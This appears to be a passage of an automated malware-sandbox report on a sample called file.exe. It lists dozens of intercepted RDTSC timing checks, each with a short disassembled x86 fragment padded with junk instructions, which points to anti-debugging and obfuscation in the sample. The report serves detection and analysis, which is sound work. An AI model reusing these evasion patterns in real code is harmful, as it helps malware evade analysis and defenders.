Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CD5EA second address: 13CD5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAF1CCF5658h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CD5F9 second address: 13CD603 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CDBDF second address: 13CDBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5666h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CDDF0 second address: 13CDDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE271 second address: 13CE277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE277 second address: 13CE27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE3DB second address: 13CE3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE5A3 second address: 13CE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEEB6 second address: 13CEF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D26FAh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FAF1CCF5658h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e jmp 00007FAF1CCF5668h 0x00000033 mov edi, 0158D07Ah 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, ecx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jmp 00007FAF1CCF5665h 0x00000046 pop esi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEF28 second address: 13CEF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEF2E second address: 13CEF41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FAF1CCF5656h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEF41 second address: 13CEF47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D08B0 second address: 13D08EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF1CCF5658h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b and si, BD0Ah 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1245152Ah], ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D08EF second address: 13D08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D08F9 second address: 13D0905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0905 second address: 13D0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0909 second address: 13D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1F2A second address: 13D1F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1C7E second address: 13D1C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3209 second address: 13D3227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FAF1CBF1D58h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D7559 second address: 13D756D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FAF1CCF5658h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D756D second address: 13D7573 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D46BC second address: 13D46C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D9724 second address: 13D972A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D972A second address: 13D9747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D9747 second address: 13D974B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA659 second address: 13DA663 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA663 second address: 13DA669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA669 second address: 13DA66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D991F second address: 13D9923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA82F second address: 13DA839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DC6B7 second address: 13DC6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DC6BD second address: 13DC6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DD6AE second address: 13DD6B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DD6B9 second address: 13DD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FAF1CCF5681h 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5660h 0x00000013 jmp 00007FAF1CCF5669h 0x00000018 popad 0x00000019 nop 0x0000001a adc edi, 32196C8Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAF1CCF5664h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAF1CCF5658h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2FA7h], eax 0x00000049 push eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DD741 second address: 13DD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE76F second address: 13DE774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE774 second address: 13DE779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DD89A second address: 13DD8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE983 second address: 13DE994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE994 second address: 13DE9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FAF1CCF5669h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1A18 second address: 13E1A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1A1C second address: 13E1A43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 adc bl, FFFFFF91h 0x00000016 push 00000000h 0x00000018 mov bx, 6B48h 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e pushad 0x0000001f je 00007FAF1CCF5656h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1A43 second address: 13E1A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E28EE second address: 13E28F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E28F2 second address: 13E2900 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2900 second address: 13E2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E38DA second address: 13E38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E4852 second address: 13E486E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E486E second address: 13E48E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FAF1CBF1D48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bh, 61h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FAF1CBF1D48h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov bx, E329h 0x0000004a jmp 00007FAF1CBF1D4Eh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E48E9 second address: 13E48ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E48ED second address: 13E48F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E48F1 second address: 13E48F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E48F7 second address: 13E4919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E4919 second address: 13E491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E491E second address: 13E4928 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E0BF0 second address: 13E0C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAF1CCF5658h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FAF1CCF5668h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+122D2BB1h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2A1Dh] 0x00000046 mov eax, dword ptr [ebp+122D05D9h] 0x0000004c cmc 0x0000004d push FFFFFFFFh 0x0000004f sub bh, 00000011h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2A90 second address: 13E2A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E58B9 second address: 13E58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2B56 second address: 13E2B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E58BE second address: 13E58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5662h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2B5A second address: 13E2B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3AA5 second address: 13E3AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3AA9 second address: 13E3AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3AAF second address: 13E3AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3AB9 second address: 13E3ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FAF1CBF1D46h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3ACE second address: 13E3AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5B10 second address: 13E5B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC767 second address: 13EC76E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC09 second address: 13EEC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF1CBF1D53h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC39 second address: 13EEC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138AA70 second address: 138AA7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4344 second address: 13F4364 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF5662h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4364 second address: 13F4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4368 second address: 13F436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4484 second address: 13F449F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF1CBF1D53h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F449F second address: 13F44A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7A38 second address: 13E7A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7A53 second address: 13E7A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7A57 second address: 13E7A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F9D00 second address: 13F9D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE920 second address: 13FE94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF1CBF1D4Fh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jne 00007FAF1CBF1D46h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF1CBF1D4Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE94D second address: 13FE975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5669h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE975 second address: 13FE981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE981 second address: 13FE987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13931DE second address: 13931FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CBF1D55h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13931FD second address: 1393203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FDD25 second address: 13FDD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF1CBF1D46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE143 second address: 13FE14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE14D second address: 13FE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE423 second address: 13FE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE561 second address: 13FE565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
